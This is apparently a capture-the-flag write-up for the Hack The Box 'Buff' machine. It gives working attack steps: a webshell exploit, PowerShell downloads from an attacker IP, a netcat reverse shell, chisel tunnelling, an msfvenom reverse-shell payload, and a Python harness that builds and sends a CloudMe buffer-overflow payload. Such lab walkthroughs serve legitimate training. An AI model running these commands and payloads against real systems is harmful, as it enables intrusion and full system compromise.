Buff

It's time for another Windows machine from Hack The Box! As usual I'm going to skip the struggle and only write down the steps that lead somewhere. Let's start by creating an nmap/ folder and then running nmap (the -oA prefix below writes nmap/buff.nmap, .gnmap and .xml):

mkdir nmap
sudo nmap -sC -sV -oA nmap/buff -T4 10.129.2.18

[screenshot: nmap-buff]

Port 8080 is serving some kind of web application, so let's check that out! After clicking around the pages a little I stumbled upon the contact page and found out that the site is built on "Gym Management Software 1.0".

[screenshot: buff-webapp]

It seemed like a good time to do some googling about this software, and I found an exploit for it on Exploit-DB! Let's test it out! Simply copy the code onto your machine, save it as exploit.py and run it against the application's base URL (port 8080 included):

python exploit.py http://10.129.2.18:8080/

We have a cool looking webshell on our hands!

[screenshot: gym-software-exploit]

The problem with this shell is that we can't navigate the file system: we don't have an interactive session, just a pipe that runs one command at a time in a fresh process, so a cd in one command doesn't carry over to the next. Let's upload Netcat to the target for a proper shell! To do that we first need nc.exe on our local machine, and then a Python HTTP server to serve it (the download command below fetches from port 8001, so serve on that port):

python3 -m http.server 8001

After that is done, let's download the file with out web shell:

echo (New-Object Net.WebClient).DownloadFile('http://10.10.14.98:8001/nc.exe', 'nc.exe') | powershell

I know it's not the most subtle or elegant way, but it works, so good enough for now! If you wrap the download in IEX(...) like most cheat sheets do you get an error after the file arrives: DownloadFile returns nothing, so Invoke-Expression is handed an empty command. Leaving IEX out avoids the noise. nc.exe lands in the webshell's working directory, which is where we run it from next. Now let's start a Netcat listener on our local machine:

nc -lnvp 9002

And then on our web shell:

nc.exe 10.10.14.98 9002 -e cmd.exe

Now we have a real shell and can explore the system much better! We are running as user shaun, so let's navigate to his home folder.

cd \Users\shaun

In the Downloads folder there is a CloudMe_1112.exe. Once again, like a real script kiddie, I started googling what the fuck that software is all about and found out that it's a cloud storage client which listens on port 8888 by default. Running

tasklist

We can see that CloudMe is running! After some more googling I found an exploit for it too. It looks like a pretty simple stack buffer overflow in the service listening on port 8888, and since CloudMe runs with administrator privileges here, a shell from it is our privesc. Let's download the exploit and save it as "privesc.py". The exploit is a Python script and the target has no Python, and port 8888 is only bound to localhost on the target (it never showed up in our nmap scan), so it's time to use chisel to tunnel that port to our local machine and run the exploit from there!

Let's upload chisel.exe to the target the same way we uploaded nc.exe:

echo (New-Object Net.WebClient).DownloadFile('http://10.10.14.98:8001/chisel.exe', 'chisel.exe') | powershell

Then set up the chisel server on our LOCAL machine:

./chisel server -p 8005 -reverse -v

And finally, run chisel.exe on the TARGET machine. A trailing & does not background a command in cmd.exe, so launch it with start /b (or from a second reverse shell) so it doesn't tie up the shell we're in:

start /b chisel.exe client 10.10.14.98:8005 R:1337:127.0.0.1:8888

I'm not going to go into details on how chisel works, but with -reverse on the server and the R: syntax on the client, our local chisel server listens on localhost:1337 and forwards every connection through the client on the target to 127.0.0.1:8888 there, so we can reach the CloudMe app as if it were running on our own machine!

Before we run the script we need to set up a payload and modify the script a little. We can generate the payload with msfvenom (32-bit, since CloudMe is a 32-bit process):

msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.98 LPORT=9005 -b '\x00\x0A\x0D' -f py

Note: make sure to exclude those bad characters (the -b flag); otherwise the payload gets mangled on the way in and will not work! Next, copy the generated shellcode into the script in place of its payload. Don't forget to rename the buf variable to payload, which is what the script expects! After that we need to change the port from 8888 to 1337, since we are tunnelling through chisel!

Next, let's set up another Netcat listener, this time on port 9005 to match the LPORT we gave msfvenom:

nc -lnvp 9005

Now, run the privesc exploit!

python3 privesc.py
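Pasting a few hundred bytes of shellcode into someone else's script by hand is exactly where these exploits go wrong, so here is a small helper I would use for that step. It is an added example, not the Exploit-DB script or anything from this box: it rebuilds the shellcode from the msfvenom -f py output without exec(), refuses to send if any of the bad characters slipped in, and assembles the usual overflow layout (filler up to the saved EIP, the overwrite, a NOP sled, the shellcode). The offset and return address are whatever the downloaded script uses; the sample msfvenom text, the file name and the function names below are my own and not taken from the real exploit.

```python
import re
import socket
import struct
import sys

# The bad characters we passed to msfvenom with -b; none may appear in the shellcode.
BADCHARS = b"\x00\x0a\x0d"

# Constructed stand-in for the first lines of `msfvenom ... -f py` output
# (the real buffer is a few hundred bytes; only the format matters here).
SAMPLE_MSFVENOM_PY = '''buf =  b""
buf += b"\\xda\\xc1\\xd9\\x74\\x24\\xf4\\x5e\\x33"
buf += b"\\xc9\\xb1\\x52\\x31\\x46\\x17"
'''


def parse_msfvenom_py(text):
    """Rebuild the raw shellcode from msfvenom's -f py output without exec()ing it."""
    out = bytearray()
    for m in re.finditer(r'b"((?:\\x[0-9a-fA-F]{2})*)"', text):
        out += bytes.fromhex(m.group(1).replace("\\x", ""))
    return bytes(out)


def find_badchars(shellcode, bad=BADCHARS):
    """Return (offset, value) for every bad byte in the shellcode; [] means it is clean."""
    return [(i, b) for i, b in enumerate(shellcode) if b in bad]


def ret_from_address(addr):
    """Pack a 32-bit return address little-endian, the way exploit scripts store EIP."""
    return struct.pack("<I", addr)


def build_payload(shellcode, offset, ret, nops=16, filler=b"A"):
    """Classic stack-overflow layout: filler up to the saved EIP, the overwrite, a NOP
    sled, then the shellcode. offset and ret are taken from the exploit script you
    downloaded; this function assumes nothing about the real CloudMe values."""
    return filler * offset + ret + b"\x90" * nops + shellcode


def send_payload(payload, host="127.0.0.1", port=1337, timeout=5.0):
    """Deliver the buffer through the chisel forward (127.0.0.1:1337 on our box ->
    127.0.0.1:8888 on the target). Returns the number of bytes sent."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)
    return len(payload)


if __name__ == "__main__":
    # usage: python3 harness.py <msfvenom_py_output> <offset> <ret_addr_hex> [host] [port]
    if len(sys.argv) < 4:
        sys.exit("usage: harness.py <msfvenom_py_output> <offset> <ret_addr_hex> [host] [port]")
    with open(sys.argv[1]) as f:
        sc = parse_msfvenom_py(f.read())
    bad = find_badchars(sc)
    if bad:
        sys.exit(f"refusing to send: bad characters at {bad}")
    payload = build_payload(sc, int(sys.argv[2]), ret_from_address(int(sys.argv[3], 16)))
    host = sys.argv[4] if len(sys.argv) > 4 else "127.0.0.1"
    port = int(sys.argv[5]) if len(sys.argv) > 5 else 1337
    print(f"shellcode {len(sc)} bytes clean, sending {len(payload)} bytes to {host}:{port}")
    send_payload(payload, host, port)
```

Save the msfvenom output to a file and point the script at it together with the offset and return address from privesc.py; the default host and port are the chisel end of the tunnel, so a failed connect there means the tunnel (not the exploit) is the problem.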

[screenshot: rooted-buff]

Pretty fun box, at least for me! Not too much Windows-specific shit, which is always a plus!